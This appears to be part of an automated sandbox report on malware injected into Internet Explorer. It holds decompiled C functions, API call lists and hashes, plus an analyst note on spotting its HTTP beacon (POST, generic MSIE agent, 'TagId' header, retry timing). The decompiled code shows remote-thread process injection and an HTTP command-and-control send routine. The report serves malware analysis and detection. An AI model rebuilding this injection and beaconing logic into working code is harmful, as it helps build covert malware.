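The user agent alone is a weak indicator (it is a generic MSIE 7.0 string), which is why the matcher also requires the POST method and the TagId header that E72B22D7F always appends; the timer values show the cadence to expect, an initial 2 s or 60 s delay followed by 15 min retries, when looking for the traffic in proxy logs.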

Control-flow Graph

C-Code - Quality: 92%
			E72B21F95(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t57;
				void* _t62;
				void* _t72;
				void* _t78;
				void* _t83;
				void* _t84;
				signed int _t95;

				_t78 = __edx;
				_push(0x6c0);
				_push(0x72b253a8);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t84 - 0x20) = 0;
				 *(_t84 - 0x1c) = 0;
				 *((intOrPtr*)(_t84 - 0x24)) = 0;
				 *(_t84 - 0x20) = GetStdHandle(0xfffffff4); // STD_ERROR_HANDLE: the inherited process handle (see E72B232DE)
				E72B24D2D(_t84 - 0x3a0, 0, 0x32e);
				 *((short*)(_t84 - 0x398)) = 0x32a;
				E72B24D14(_t84 - 0x6d0, _t84 - 0x3a0, 0x32e);
				E72B24D44(_t84 - 0x70, _t84 - 0x6c8, _t84 - 0x398);
				 *((intOrPtr*)(_t84 - 0x3c)) = E72B25277;
				 *((intOrPtr*)(_t84 - 0x38)) = E72B25313;
				 *((intOrPtr*)(_t84 - 0x34)) = E72B2224A;
				_t83 =  *(_t84 + 8);
				 *(_t84 - 0x30) = _t83;
				 *_t83 = 0x237;
				 *((intOrPtr*)(_t83 + 4)) = 6;
				if( *(_t84 - 0x20) != 0 &&  *(_t84 - 0x20) == GetStdHandle(0xfffffff6)) { // only if the same handle also sits in STD_INPUT_HANDLE, the marker set by SetStdHandle in E72B232DE
					 *((intOrPtr*)(_t84 - 0x24)) = 1;
					 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) | 0x00000004;
					_t72 = CreateRemoteThread( *(_t84 - 0x20), 0, 0, E72B23223(E72B21C7B), _t83, 4, _t84 - 0x28); // executed; 4 = CREATE_SUSPENDED, resumed below
					 *(_t84 - 0x1c) = _t72;
					if(_t72 == 0) {
						 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) & 0x000000fb;
					}
				}
				 *(_t84 + 8) = E72B21829;
				if( *((intOrPtr*)(_t83 + 0x6c)) == 4) {
					 *(_t84 + 8) = 0;
				}
				_t75 = _t83 + 0x1bc8;
				_t57 = E72B21775(_t83, _t83 + 0x1bc8, 0, 2); // executed
				if(_t57 == 0) {
					L15:
					return E72B2159C(E72B24DC6(_t78, _t95, _t84 - 0x70), _t78);
				} else {
					_t62 = E72B21775(_t83, _t83 + 0x78,  *(_t84 + 8), 1); // executed
					if(_t62 == 0) {
						goto L15;
					}
					 *(_t84 - 4) = 0;
					if( *((intOrPtr*)(_t84 - 0x24)) == 0) {
						E72B22429(_t75, 0);
					}
					if( *(_t84 - 0x1c) == 0) {
						do {
							_push(_t84 - 0x70);
							__eflags = E72B21D27(_t75, _t78, 0, _t83, __eflags);
						} while (__eflags != 0);
						goto L14;
					} else {
						ResumeThread( *(_t84 - 0x1c)); // executed
						WaitForMultipleObjects(2, _t84 - 0x20, 0, 0xffffffff); // wait for either the target process or the remote thread to end (bWaitAll = FALSE, INFINITE)
						CloseHandle( *(_t84 - 0x1c));
						L14:
						_t42 = _t84 - 4;
						 *_t42 =  *(_t84 - 4) | 0xffffffff;
						_t95 =  *_t42;
						goto L15;
					}
				}
			}










(per-line address column for the listing above, 0x72b21f95 to 0x72b22109; disassembly text not captured)

APIs
  • GetStdHandle.KERNEL32(000000F4,72B253A8,000006C0,72B21D08,00000000), ref: 72B21FB7
    • Part of subcall function 72B24D44: GetVersion.KERNEL32(?,72B26150,00000034,0000032E,?,72B22004,000000FF,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B24D61
  • GetStdHandle.KERNEL32(000000F6,000000FF,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B22033
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 72B2205F
  • ResumeThread.KERNEL32(00000000,?,?,72B21829,00000001,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E,?), ref: 72B220C1
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 72B220D0
  • CloseHandle.KERNEL32(00000000), ref: 72B220D9
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Handle$Thread$CloseCreateMultipleObjectsRemoteResumeVersionWait
  • String ID:
  • API String ID: 3869061129-0
  • Opcode ID: bb151290f7270c56c43afc32b5ce531f27b59d51cec2e0ace73879a3adb713dd
  • Instruction ID: 355344fad5c52479a02bf13cfb35cb00ff9462887997cb78211b3fa50bd0aa08
  • Opcode Fuzzy Hash: bb151290f7270c56c43afc32b5ce531f27b59d51cec2e0ace73879a3adb713dd
  • Instruction Fuzzy Hash: A4418BB1C00318ABDF21CFA9CC84EDFBAF8EF84351F10461AE55AA6091E7745A41CF64
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E72B22FF9(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES* _v92;
				char _v144;
				struct tagMSG _v172;
				void* _t31;
				void* _t42;
				void* _t48;
				char* _t53;
				void* _t56;
				char _t60;

				E72B24D2D( &_v144, 0, 0x80);
				_v8 = 3;
				while(1) {
					L1:
					_v8 = _v8 - 1;
					_t31 = _v8 - 1;
					_v12 = 0;
					if(_t31 == 0) {
						break;
					}
					if(_t31 != 1) {
						L12:
						E72B22D40( &_v144);
						return PostMessageA( *0x72b2600c, 0x400, 1, 2);
					}
					_t54 = _a4;
					_t8 =  *_a4 + 6; // 0x4
					_t53 = _t8;
					_t60 =  *0x72b260ce; // 0x0
					if(_t60 != 0) {
						_t53 = 0x72b260ce;
					}
					_t48 = E72B22D7F( &_v144, _t53, _t45 + 2,  *((intOrPtr*)(_t54 + 4))); // executed
					if(_t48 > 0) {
						if(PeekMessageA( &_v172, 0, 0x12, 0x12, 0) == 0) {
							continue;
						}
					}
					goto L12;
				}
				_t56 = LocalAlloc(0x40, 0x4464);
				if(_t56 != 0) {
					 *(_t56 + 0x70) =  *(_t56 + 0x70) | 0xffffffff;
					 *(_t56 + 0x5c) =  *(_t56 + 0x5c) | 0x00000004;
					 *((intOrPtr*)(_t56 + 0x3ba8)) = GetCurrentThreadId();
					_t18 = _t56 + 0x3c58; // 0x3c58
					E72B24D14(_t18,  &_v144, 0x80);
					 *((intOrPtr*)(_t56 + 0x6c)) = 3;
					_t42 = CreateThread(0, 0, E72B21C2C, _t56, 0,  &_v16); // executed
					 *(_t56 + 0x3ba4) = _t42;
					if(_t42 != 0) {
						_v92 = 0;
						_v12 = 1;
						SetThreadPriority( *(_t56 + 0x3ba4), 0xfffffff1); // executed
					}
				}
				E72B21F30(_t56, _v12);
				if(_v12 != 0) {
					goto L1;
				} else {
					goto L12;
				}
			}

APIs
  • PeekMessageA.USER32(?,00000000,00000012,00000012,00000000), ref: 72B23072
  • LocalAlloc.KERNEL32(00000040,00004464,?,00000000,00000080), ref: 72B23088
  • GetCurrentThreadId.KERNEL32 ref: 72B2309C
  • CreateThread.KERNEL32(00000000,00000000,72B21C2C,00000000,00000000,?), ref: 72B230D0
  • SetThreadPriority.KERNEL32(?,000000F1), ref: 72B230F2
  • PostMessageA.USER32 ref: 72B23125
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Thread$Message$AllocCreateCurrentLocalPeekPostPriority
  • String ID:
  • API String ID: 2250156434-0
  • Opcode ID: abc693c2b54a9fea2a3e5a45b99c7ce19da87f2b526a230208ad191b8d5988ec
  • Instruction ID: 600c3e933443d6e78f6ca0bd9c7fa0cb8a0584d99d1a0196c81ce118fa489354
  • Opcode Fuzzy Hash: abc693c2b54a9fea2a3e5a45b99c7ce19da87f2b526a230208ad191b8d5988ec
  • Instruction Fuzzy Hash: 1A316171900704BFDB219BA9CC49FCBBBFCEB84746F104559F65AE6181E7709A48CB20
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E72B21775(intOrPtr _a4, long _a8, _Unknown_base(*)()* _a12, int _a16) {
				signed char _t21;
				void* _t28;
				void* _t32;
				void* _t40;

				_t40 = _a8;
				_t21 =  *(_t40 + 0x1b44);
				if((_t21 & 0x00000001) == 0) {
					 *(_t40 + 0x1b44) = _t21 | 0x00000001;
					_t7 = _a4 + 0x70; // 0x840f4800
					 *((intOrPtr*)(_t40 + 0x1b48)) = _a4;
					 *((intOrPtr*)(_t40 + 0x1b14)) =  *_t7;
					InitializeCriticalSection(_t40 + 0x1b18);
					 *((intOrPtr*)(_t40 + 0x1b40)) = CreateEventA(0, 1, 0, 0);
					_t28 = CreateEventA(0, 1, 0, 0);
					 *(_t40 + 0x1b10) = _t28;
					if( *((intOrPtr*)(_t40 + 0x1b40)) == 0 || _t28 == 0) {
						L6:
						E72B216BA(_t40);
					} else {
						if(_a12 == 0) {
							L5:
							SetThreadPriority( *(_t40 + 0x1b0c), _a16); // executed
						} else {
							_t32 = CreateThread(0, 0, _a12, _t40, 0,  &_a8); // executed
							 *(_t40 + 0x1b0c) = _t32;
							if(_t32 == 0) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
				}
				return  *(_t40 + 0x1b44) & 1;
			}

APIs
  • InitializeCriticalSection.KERNEL32(?,00000000,?,?,?,72B22093,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E), ref: 72B217AD
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,72B22093,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E), ref: 72B217C0
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,72B22093,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E), ref: 72B217CD
  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 72B217F1
  • SetThreadPriority.KERNEL32(?,?,?,72B22093,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E,?,00000000), ref: 72B2180A
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Create$EventThread$CriticalInitializePrioritySection
  • String ID:
  • API String ID: 2454249074-0
  • Opcode ID: c8a72f0a4be396ac6ee2950f9911c6e9136fd36da346fd89e7378417be704383
  • Instruction ID: 2b7b849261d314237348428b04d03b57a499ce12b49900591cbacb009e5b40d1
  • Opcode Fuzzy Hash: c8a72f0a4be396ac6ee2950f9911c6e9136fd36da346fd89e7378417be704383
  • Instruction Fuzzy Hash: 41117C32110784AFC7319F2ACC84EE7BBF9FBC9751B14891EF96A86102E331A440DB60
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E72B2253C(void* __ecx, void* __eflags, void* _a4) {
				long _v8;
				long _v12;
				void* _t7;
				void* _t9;
				void* _t19;

				_v8 = _v8 & 0x00000000;
				_t7 = GetStdHandle(0xfffffff4);
				_t9 = CreateRemoteThread(_t7, 0, 0, E72B23223(E72B22314), _a4, 0,  &_v12); // executed
				_t19 = _t9;
				if(_t19 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					GetExitCodeThread(_t19,  &_v8);
					CloseHandle(_t19);
				}
				return _v8;
			}

APIs
  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22548
  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 72B22569
  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22578
  • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22583
  • CloseHandle.KERNEL32(00000000,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B2258A
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: HandleThread$CloseCodeCreateExitObjectRemoteSingleWait
  • String ID:
  • API String ID: 3128336559-0
  • Opcode ID: 2b8f83884517cb3ba26775e358e24cda4cd880b66a82d5994a4a5c0914fcdb4e
  • Instruction ID: 009471020fc4e506f9a1f4f8785b6e6bc51251f61989519d315005196ebec4ca
  • Opcode Fuzzy Hash: 2b8f83884517cb3ba26775e358e24cda4cd880b66a82d5994a4a5c0914fcdb4e
  • Instruction Fuzzy Hash: 9CF09077450344BFDB118795CC49FAF36F8DB857A1F310618F615A31C2DB74A5019725
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 86%
			E72B2294C(void* __ebx, void* __edx, void* __esi, void* __eflags) {
				short* _t19;
				int _t24;
				short _t28;
				void* _t29;
				void* _t30;
				intOrPtr _t32;
				void* _t33;

				_t29 = __edx;
				_push(0x8c);
				_push(0x72b253d8);
				E72B24A94(__ebx, _t30, __esi);
				_t32 =  *((intOrPtr*)(_t33 + 8));
				_t19 = _t32 + 0x3cb0;
				if( *_t19 == 0) {
					_t28 = 0x30;
					 *_t19 = _t28;
				}
				 *(_t33 - 4) = 0;
				wsprintfA(_t33 - 0x9c, "Content-Length: %d\r\n%s: %s\r\n",  *(_t33 + 0x10), "TagId", _t19);
				 *((intOrPtr*)(_t32 + 0x3c70))( *(_t32 + 0x3c60), _t33 - 0x9c, 0xffffffff, 0xa0000000);
				_t24 = HttpSendRequestA( *(_t32 + 0x3c60), 0, 0,  *(_t33 + 0xc),  *(_t33 + 0x10));
				 *(_t33 - 0x1c) = _t24;
				if(_t24 == 0) {
					 *(_t32 + 0x5c) =  *(_t32 + 0x5c) & 0x000000fb;
				}
				 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
				return E72B2159C(_t24, _t29);
			}

APIs
  • wsprintfA.USER32 ref: 72B22988
  • HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 72B229B9
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: HttpRequestSendwsprintf
  • String ID: Content-Length: %d%s: %s$TagId
  • API String ID: 2076034926-1589559193
  • Opcode ID: 1f0392a83556ce175696367e57bada25f7a316907c1632c483e3097c36dedfd6
  • Instruction ID: 2e58099248e1f5e2e9d4c2e7d97d0df0c294e3bc8f827e7bb89a638015fdf798
  • Opcode Fuzzy Hash: 1f0392a83556ce175696367e57bada25f7a316907c1632c483e3097c36dedfd6
  • Instruction Fuzzy Hash: FA019271414359EFEB129F78CC44E9ABBB8BF04315F104658F9AAF6092D7305A50DF10
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E72B22EA1(void* __ecx, intOrPtr _a4) {
				char _v8;
				signed char _t5;
				void* _t6;
				intOrPtr _t8;
				char* _t9;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t25;

				_t23 =  *0x72b260a8; // 0x100
				if(_t23 == 0) {
					L5:
					__eflags =  *0x72b26088; // 0x0
					if(__eflags != 0) {
						L10:
						_t6 = 0;
					} else {
						E72B237BE(_t5, __eflags, 0x72b2603c,  *0x72b260a0);
						__eflags =  *0x72b2605f; // 0x1
						if(__eflags == 0) {
							 *0x72b260b8 = 0;
						}
						__eflags =  *0x72b260b8; // 0x1
						if(__eflags != 0) {
							L12:
							 *0x72b26030 = 0x72b2603c; // executed
							_t6 = CreateThread(0, 0, E72B23132, 0, 0, 0x72b26148); // executed
							 *0x72b260a8 = _t6;
						} else {
							 *0x72b26034 =  *0x72b26034 + 1;
							_t8 =  *0x72b26034; // 0x0
							__eflags = _t8 - _a4;
							if(__eflags < 0) {
								_t9 =  *0x72b260a0; // 0x72b27226
								 *_t9 = 0;
								E72B237BE(_t9, __eflags, 0x72b2603c,  *0x72b260a0);
								 *0x72b2605f = 1;
								 *0x72b260b8 = 1;
								goto L12;
							} else {
								goto L10;
							}
						}
					}
				} else {
					PostThreadMessageA( *0x72b26148, 0x12, 0, 0);
					WaitForSingleObject( *0x72b260a8, 0x7530);
					CloseHandle( *0x72b260a8);
					 *0x72b260a8 = 0;
					_t5 =  *((intOrPtr*)(E72B23C14(0x1e, 0,  &_v8)));
					_t24 =  *0x72b2602c; // 0x0
					if(_t24 != 0) {
						L3:
						if((_t5 & 0x00000004) == 0) {
							goto L5;
						} else {
							_t6 = 0;
						}
					} else {
						_t25 =  *0x72b260b8; // 0x1
						if(_t25 == 0) {
							goto L5;
						} else {
							goto L3;
						}
					}
				}
				return _t6;
			}

APIs
  • PostThreadMessageA.USER32 ref: 72B22EBA
  • WaitForSingleObject.KERNEL32(00007530), ref: 72B22ECB
  • CloseHandle.KERNEL32 ref: 72B22ED7
  • CreateThread.KERNEL32(00000000,00000000,Function_00003132,00000000,00000000,72B26148), ref: 72B22F85
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Thread$CloseCreateHandleMessageObjectPostSingleWait
  • String ID:
  • API String ID: 3204264564-0
  • Opcode ID: 5c150527a3dcd8632fa4d2c8eb45422c0a244393909aa92e597cd2ea823468ca
  • Instruction ID: 55e1e3665506082e23fab281f5e934d135a5a335b73c88e28fd5a4c76e9a1134
  • Opcode Fuzzy Hash: 5c150527a3dcd8632fa4d2c8eb45422c0a244393909aa92e597cd2ea823468ca
  • Instruction Fuzzy Hash: 5021A7724853C4BFEB22D726C8C0B473FE9E70D2C6722081CE54AC7117D3210899E755
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 96%
			E72B22429(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t16;
				signed int _t20;
				void* _t23;
				void* _t25;
				intOrPtr _t28;
				void* _t32;
				intOrPtr* _t33;
				intOrPtr _t35;

				_t28 = _a4;
				_t3 = _t28 + 0x1b48; // 0x98e9
				_t35 =  *_t3 + 0x78;
				_t32 = 1;
				_t16 = _a8;
				if(_t16 == 0) {
					_t35 = _t28;
					L5:
					_t5 = _t28 + 0x1b40; // 0xfc4ce856
					SetEvent( *_t5);
					L6:
					if(( *(_t35 + 0x1b44) & 0x00000004) != 0) {
						_t9 = _t35 + 0x20; // 0x9891
						_t33 = _t9;
						E72B21A7E(_t35);
						_t10 = _t28 + 0x1b40; // 0x72b23369
						_t11 = _t28 + 0x1b48; // 0x98e9
						 *_t33 = _t10 -  *_t11;
						 *((intOrPtr*)(_t33 + 4)) = 0x14;
						_t13 = _t28 + 0x1b40; // 0xfc4ce856
						_t20 = WaitForSingleObject( *_t13, 0);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t33 + 8)) =  ~_t20 + 1;
						_t23 = E72B2253C(_t10 -  *_t11,  ~_t20 + 1, _t33); // executed
						_t32 = _t23;
						E72B215AD(_t35);
					}
					return _t32;
				}
				_t25 = _t16 - 1;
				if(_t25 == 0) {
					goto L5;
				}
				if(_t25 == 1) {
					_t4 = _t28 + 0x1b40; // 0xfc4ce856
					ResetEvent( *_t4);
				}
				goto L6;
			}

APIs
  • ResetEvent.KERNEL32(FC4CE856,00000000,?,?,?,72B220B9,?,00000000,?,?,72B21829,00000001,?,?,00000000,00000002), ref: 72B22452
  • SetEvent.KERNEL32(FC4CE856,00000000,?,?,?,72B220B9,?,00000000,?,?,72B21829,00000001,?,?,00000000,00000002), ref: 72B22462
  • WaitForSingleObject.KERNEL32(FC4CE856,00000000,72B21829), ref: 72B22497
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Event$ObjectResetSingleWait
  • String ID:
  • API String ID: 463700304-0
  • Opcode ID: b076a45a44b05ff2950e3405ec3ac076df081c87bdc46bd345c917783711913f
  • Instruction ID: 489b9761182771e32d3c2f36c9c0cf2ae3132ab2c47af561efee3482e56b6e31
  • Opcode Fuzzy Hash: b076a45a44b05ff2950e3405ec3ac076df081c87bdc46bd345c917783711913f
  • Instruction Fuzzy Hash: D90169361203049BCB006F69CC54AD6BBE8FF94746F198079EE5EDB157EB309814CBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 96%
			E72B21829(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t52;
				void* _t53;
				void* _t58;
				void* _t60;
				intOrPtr _t62;
				void* _t64;
				void* _t66;
				intOrPtr _t68;
				void* _t72;
				void* _t80;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t86;

				_t80 = __edx;
				_push(0x20);
				_push(0x72b253f8);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t86 - 0x20) =  *(_t86 - 0x20) & 0x00000000;
				_t82 =  *((intOrPtr*)(_t86 + 8));
				_t85 =  *((intOrPtr*)(_t82 + 0x1b48)) + 0x1bc8;
				 *((intOrPtr*)(_t86 - 0x24)) =  *((intOrPtr*)(_t82 + 0x1b14));
				if(( *(_t82 + 0x1b44) & 0x00000004) != 0) {
					WaitForSingleObject( *(_t85 + 0x1b40), 0xffffffff);
				}
				 *(_t86 - 4) =  *(_t86 - 4) & 0x00000000;
				while(( *(_t85 + 0x1b44) & 0x00000001) != 0 && ( *(_t82 + 0x1b44) & 0x00000001) != 0) {
					 *(_t86 - 0x20) =  *(_t86 - 0x20) + 1;
					_t52 =  *(_t86 - 0x20);
					if(_t52 == 0) {
						 *((intOrPtr*)(_t86 - 0x2c)) = 0xd80;
						continue;
					}
					_t53 = _t52 - 1;
					if(_t53 == 0) {
						__eflags =  *((intOrPtr*)(_t86 - 0x2c)) - 0xd80;
						if(__eflags > 0) {
							 *((intOrPtr*)(_t86 - 0x2c)) = 0xd80;
						}
						E72B229E4(0xd80, _t80, _t82, _t85, __eflags,  *((intOrPtr*)(_t82 + 0x1b48)), _t82 + 0xd8c,  *((intOrPtr*)(_t86 - 0x2c)), _t86 - 0x1c);
						__eflags =  *((intOrPtr*)(_t86 - 0x1c));
						L23:
						if(__eflags == 0) {
							E72B2210C( *((intOrPtr*)(_t86 - 0x24)));
						}
						continue;
					}
					_t58 = _t53 - 1;
					if(_t58 == 0) {
						_t60 = 0xd80 -  *((intOrPtr*)(_t82 + 8));
						__eflags =  *((intOrPtr*)(_t86 - 0x1c)) - _t60;
						if( *((intOrPtr*)(_t86 - 0x1c)) > _t60) {
							_t78 =  *((intOrPtr*)(_t86 - 0x1c)) - _t60;
							__eflags =  *((intOrPtr*)(_t86 - 0x1c)) - _t60;
							E72B215CC(_t82,  *((intOrPtr*)(_t86 - 0x1c)) - _t60, _t82, 0,  *((intOrPtr*)(_t86 - 0x1c)) - _t60);
						}
						_t62 = E72B2162F(0xd80, _t78, _t82, _t82 + 0xd8c,  *((intOrPtr*)(_t86 - 0x1c))); // executed
						__eflags = _t62;
						goto L23;
					}
					_t64 = _t58 - 1;
					if(_t64 == 0) {
						WaitForSingleObject( *(_t85 + 0x1b10), 0xffffffff);
						continue;
					}
					_t66 = _t64 - 1;
					if(_t66 == 0) {
						_t68 = E72B215CC(_t82, __eflags, _t85, _t85 + 0xd8c, 0xd80);
						 *((intOrPtr*)(_t86 - 0x1c)) = _t68;
						__eflags = _t68;
						if(__eflags != 0) {
							continue;
						}
						L15:
						 *(_t86 - 0x20) =  *(_t86 - 0x20) & 0x00000000;
						continue;
					}
					_t97 = _t66 != 1;
					if(_t66 != 1) {
						continue;
					}
					E72B22429(_t85, 2); // executed
					_t72 = E72B2294C(0xd80, _t80, _t85, _t97,  *((intOrPtr*)(_t85 + 0x1b48)), _t85 + 0xd8c,  *((intOrPtr*)(_t86 - 0x1c))); // executed
					if(_t72 == 0) {
						E72B2210C( *((intOrPtr*)(_t86 - 0x24)));
					}
					E72B22429(_t85, 1); // executed
					goto L15;
				}
				 *(_t86 - 4) =  *(_t86 - 4) | 0xffffffff;
				__eflags = 0;
				return E72B2159C(0, _t80);
			}

APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 72B21862
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 72B2190A
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: ObjectSingleWait
  • String ID:
  • API String ID: 24740636-0
  • Opcode ID: 6f89b8e4e7d24eea5171e94811583e31212ca73a2607e56a9dd449ed73a44601
  • Instruction ID: 1cd3c94c938bd48e2da1cd979ccb837cf298ca92addc6a0b682ed9aa0d1bd90e
  • Opcode Fuzzy Hash: 6f89b8e4e7d24eea5171e94811583e31212ca73a2607e56a9dd449ed73a44601
  • Instruction Fuzzy Hash: 6E41557492070AABDF168BBCCC40BEDBAF8FF44316F009125E92EB5196E7346552CB64
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E72B2162F(void* __ebx, void* __ecx, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _t38;
				signed int _t40;
				signed int* _t51;

				_t51 = _a4;
				_t52 = _t51[0x6d1] & 0x00000004;
				if((_t51[0x6d1] & 0x00000004) == 0) {
					E72B21A7E(_t51);
					_a4 = _a4 & 0x00000000;
					__eflags = _t51[2] - 0xd80;
					if(_t51[2] < 0xd80) {
						_t40 = _a8;
						while(1) {
							__eflags = _a4 - _a12;
							if(_a4 >= _a12) {
								break;
							}
							__eflags = _t40;
							if(_t40 != 0) {
								 *((char*)( &(_t51[3]) +  *_t51)) =  *_t40;
								_t40 = _t40 + 1;
								__eflags = _t40;
							}
							_t21 = _t51[2] + 1; // 0x1
							_t51[2] = _t21;
							 *_t51 = ( *_t51 + 1) % 0xd80;
							__eflags = _t51[2];
							if(_t51[2] == 0) {
								SetEvent(_t51[0x6c4]);
							}
							_a4 = _a4 + 1;
							__eflags = _t51[2] - 0xd80;
							if(_t51[2] < 0xd80) {
								continue;
							}
							break;
						}
					}
					E72B215AD(_t51);
				} else {
					_t38 = E72B2278E(__ecx, _t52, _t51, _a8, _a12); // executed
					_a4 = _t38;
				}
				return _a4;
			}

APIs
  • SetEvent.KERNEL32(?,00000000,?,?), ref: 72B2169C
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Event
  • String ID:
  • API String ID: 4201588131-0
